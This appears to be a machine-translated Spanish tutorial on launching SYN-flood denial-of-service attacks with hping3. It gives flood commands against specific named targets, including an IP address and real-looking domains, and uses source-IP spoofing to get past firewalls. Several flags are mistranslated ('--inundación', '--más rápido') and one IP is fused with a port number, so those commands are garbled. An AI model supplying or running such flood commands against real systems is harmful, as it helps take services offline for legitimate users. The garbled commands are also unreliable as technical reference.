Seguridad

hping3 flood ddos

hping3 flood ddos
Este tutorial se centra en los ataques DDOS (denegación de servicio distribuida) utilizando la herramienta hping3. Si ya está familiarizado con los ataques DOS (Denial of Service) y DDOS, puede continuar leyendo las instrucciones prácticas de hping3; de lo contrario, se recomienda conocer cómo funcionan estos ataques.

Ataques DOS


Un ataque de denegación de servicio (DOS) es una técnica muy simple para negar la accesibilidad a los servicios (por eso se llama ataque de "denegación de servicio"). Este ataque consiste en sobrecargar al objetivo con paquetes de gran tamaño, o una gran cantidad de ellos.

Si bien este ataque es muy fácil de ejecutar, no compromete la información o la privacidad del objetivo, no es un ataque con penetración y solo tiene como objetivo evitar el acceso al objetivo.
Al enviar una cantidad de paquetes, el objetivo no puede manejar a los atacantes y evitar que el servidor atienda a usuarios legítimos.

Los ataques de DOS se llevan a cabo desde un solo dispositivo, por lo que es fácil detenerlos bloqueando la IP del atacante, sin embargo, el atacante puede cambiar e incluso falsificar (clonar) la dirección IP de destino, pero no es difícil para los firewalls lidiar con tales ataques , al contrario de lo que ocurre con los ataques DDOS.

Ataques DDOS

Un ataque de denegación de servicio distribuido (DDOS) es similar a un ataque de DOS pero se lleva a cabo desde diferentes nodos (o diferentes atacantes) simultáneamente. Por lo general, los ataques DDOS los llevan a cabo botnets. Las botnets son scripts o programas automatizados que infectan las computadoras para llevar a cabo una tarea automatizada (en este caso, un ataque DDOS). Un hacker puede crear una botnet e infectar muchas computadoras desde las cuales las botnets lanzarán ataques DOS, el hecho de que muchas botnets disparen simultáneamente convierte el ataque DOS en un ataque DDOS (por eso se le llama "distribuido").

Por supuesto, existen excepciones en las que los ataques DDOS fueron realizados por atacantes humanos reales, por ejemplo el grupo de hackers Anonymous integrado por miles de personas en todo el mundo utilizó esta técnica con mucha frecuencia debido a su fácil implementación (solo requería voluntarios que compartieran su causa), así es, por ejemplo, cómo Anonymous dejó al gobierno libio de Gadafi completamente desconectado durante la invasión, el estado libio quedó indefenso ante miles de atacantes de todo el mundo.

Este tipo de ataques, cuando se llevan a cabo desde muchos nodos diferentes, es extremadamente difícil de prevenir y detener y normalmente requieren un hardware especial para manejar, esto se debe a que los firewalls y las aplicaciones defensivas no están preparados para lidiar con miles de atacantes simultáneamente. Este no es el caso de hping3, la mayoría de los ataques llevados a cabo a través de esta herramienta serán bloqueados por dispositivos o software defensivos, pero es útil en redes locales o contra objetivos mal protegidos.

Sobre hping3

La herramienta hping3 te permite enviar paquetes manipulados. Esta herramienta le permite controlar el tamaño, la cantidad y la fragmentación de los paquetes para sobrecargar el objetivo y evitar o atacar los firewalls. Hping3 puede ser útil para propósitos de prueba de seguridad o capacidad, usándolo puede probar la efectividad de los firewalls y si un servidor puede manejar una gran cantidad de paquetes. A continuación, encontrará instrucciones sobre cómo utilizar hping3 para realizar pruebas de seguridad.

Comenzando con los ataques DDOS usando hping3:

En Debian y distribuciones Linux basadas, puede instalar hping3 ejecutando:

# apt install hping3 -y

Un simple ataque DOS (no DDOS) sería:

# sudo hping3 -S --flood -V -p 80170.155.9.185

Dónde:
sudo: da los privilegios necesarios para ejecutar hping3.
hping3:
llamadas al programa hping3.
-S: especifica paquetes SYN.
-inundación: Dispare a discreción, las respuestas se ignorarán (por eso no se mostrarán las respuestas) y los paquetes se enviarán lo más rápido posible.
-V: Verbosidad.
-pág. 80: puerto 80, puede reemplazar este número por el servicio que desea atacar.
170.155.9.185: IP de destino.

Flood usando paquetes SYN contra el puerto 80:

El siguiente ejemplo muestra un ataque SYN contra lacampora.org:

# sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --flood --rand-source

Dónde:
Lacampora.org: es el objetivo
-q: breve salida
-norte: mostrar la IP de destino en lugar del host.
-d 120: establecer el tamaño del paquete
-fuente aleatoria: ocultar la dirección IP.

El siguiente ejemplo muestra otro posible ejemplo de inundación:

Inundación SYN contra el puerto 80:

# sudo hping3 --and-source ivan.com -S -q -p 80 --inundación

Con hping3 también puede atacar a sus objetivos con una IP falsa, para eludir un firewall, incluso puede clonar su IP de destino, o cualquier dirección permitida que pueda conocer (puede lograrlo, por ejemplo, con Nmap o un rastreador para escuchar establecido conexiones).

La sintaxis sería:

# sudo hping3 -a -S -q -p 80 --más rápido -c2

En este ejemplo práctico, el ataque parecería:

# sudo hping3 -a 190.0.175.100 190.0.175.100 -S -q -p 80 --más rápido -c2

Espero que hayas encontrado útil este tutorial sobre hping3. Siga siguiendo LinuxHint para obtener más consejos y actualizaciones sobre Linux y redes.

Cómo descargar y jugar Sid Meier's Civilization VI en Linux
Introducción al juego Civilization 6 es una versión moderna del concepto clásico introducido en la serie de juegos Age of Empires. La idea era bastant...
Cómo instalar y jugar a Doom en Linux
Introducción a Doom La serie Doom se originó en los años 90 después del lanzamiento del Doom original. Fue un éxito instantáneo y, desde ese momento e...
Vulkan para usuarios de Linux
Con cada nueva generación de tarjetas gráficas, vemos que los desarrolladores de juegos superan los límites de la fidelidad gráfica y se acercan un pa...